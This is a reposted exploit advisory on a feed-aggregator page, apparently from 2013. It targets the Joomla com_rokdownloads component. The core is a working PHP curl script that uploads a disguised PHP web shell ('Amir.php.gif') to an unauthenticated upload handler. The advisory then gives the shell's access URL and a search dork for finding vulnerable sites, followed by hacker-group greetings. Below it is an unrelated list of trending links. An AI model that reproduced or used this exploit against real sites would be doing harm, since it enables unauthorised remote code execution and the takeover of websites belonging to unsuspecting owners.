Quantcast
Channel: joomla – MondoUnix
Viewing all articles
Browse latest Browse all 119

Joomla Rokdownloads Shell Upload

June 25, 2013, 3:03 am
$
0
0 
#################################
 
#                     ISlamic Republic Of Iran Security Team
 
#                                Www.IrIsT.Ir
 
#################################
 
# Exploit Title : joomla com_rokdownloads Components shell upload Vulnerability
 
# Author        : IrIsT Security & Researcher Team
 
# Discovered By : Am!r
 
# Home          : http://IrIsT.Ir - http://IrIsT.Ir/forum
 
# Facebook Page : http://www.facebook.com/pages/IrIsT-Hacking-Security-Researcher-Group/488307267857573
 
# Software Link : http://www.joomla.org
 
# Security Risk : High
 
# Tested on     : Linux
 
# Dork          : inurl:administrator/components/com_rokdownloads
 
#################################
  Exploit :
 
  Post.php
 
  <?php
 
  $uploadfile="Amir.php.gif";
 
  $ch = 
  curl_init("http://www.exemple.com/administrator/components/com_rokdownloads/assets/uploadhandler.php");
  curl_setopt($ch, CURLOPT_POST, true);
  curl_setopt($ch, CURLOPT_POSTFIELDS,
                array('Filedata'=>"@$uploadfile"));
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  $postResult = curl_exec($ch);
  curl_close($ch);
  print "$postResult";
 
  ?>
 
  Shell Access : http://www.exemple.com/images/stories/Amir.php.gif
 
#################################
 
# Greats : B3HZ4D - C0dex - TaK.FaNaR - F@rid - Beni_Vanda - dr.koderz - Mr Zer0 - Smartprogrammer - z3r0
 
# sajjad13and11 - silent - Bl4ck M4n - AHAAD - ARTA - Dj.TiniVini - E2MA3N - Immortal Boy - IR Anonymous
 
# Mikili - Mr.F@RDIN - Net.W0lf - skote_vahshat - Net.W0lf -  MedRiK - 4xp3r-bh - Sokout - mehdiv
 
#                      &    All Members In IrIsT.Ir
 
#################################
 
#Tnx To : PacketstormSecurity.Org - Cxsecurity.Com - 1337day.com - exploit-db.com
 
#################################
Search
Viewing all articles
Browse latest Browse all 119

Trending Articles

Scuffham Amps - S-GEAR 2.6.0 VST, AAX, STANDALONE x86 x64 (R2R NO iLok2, +NO...

November 19, 2017, 7:24 am

Practice Sheet of Right form of verbs for HSC Students

September 22, 2019, 11:40 pm

VHSE First (1st) Allotment 2025 - vhscap.kerala.gov.in

May 24, 2025, 11:58 pm

UNIVERSE LEAGUE – UNIVERSE LEAGUE – WAR (We Are Ready) – EP [iTunes Plus M4A]

January 26, 2025, 11:12 am

City Hunter Teledrama – Episode 18 – 07th May 2016

May 6, 2016, 2:05 pm

Comment on Proposed Criteria for Identifying Predatory Conferences by Luke...

July 4, 2016, 3:53 am

Bureau of Internal Revenue: Regional Offices (Directory)

January 9, 2014, 11:06 pm

Kendrick Lamar – Not Like Us (2024) [24Bit-88.2kHz] [PMEDIA] ⭐️

May 14, 2024, 7:14 pm

Inception 2010 Hindi Dual Audio 650MB BRRip 720p ESubs HEVC

December 27, 2016, 4:23 pm

East Hull MD admits sexual assaults after another victim comes forward

January 14, 2013, 12:20 am

Download: FK ft Shenky – Nakuyewa ”Prod by: Shenky”

February 16, 2017, 4:24 pm

R. v. Sargeant, 2023 ONSC 6406 (CanLII)

November 13, 2023, 9:00 pm

Rajasthan Board 10th Result 2016 Roll No wise & Name Wise

August 20, 2016, 5:13 pm

Who’s been sentenced at Northampton Magistrates’ Court

March 30, 2019, 10:00 pm

मतलबी दोस्त स्टेट्स | Matlabi Dost Status in Hindi – Selfish Friends Status

February 13, 2020, 3:12 am

Family cries out as traditional ruler allegedly abducts brother, extorts N2.5m

September 15, 2024, 1:15 am

Long-Running Conflict In Springfield (MA) Gangland Sphere Has Manzi Family &...

December 26, 2017, 3:59 pm

Wondershare Filmora X v10.1.20.16 x64

February 8, 2021, 5:34 am

Man arrested after fracas in flat

January 16, 2017, 10:10 pm

Man charged in ongoing Sexual Assault Investigation Derek Nyilas, 46, Faces...

May 27, 2019, 8:00 am
Search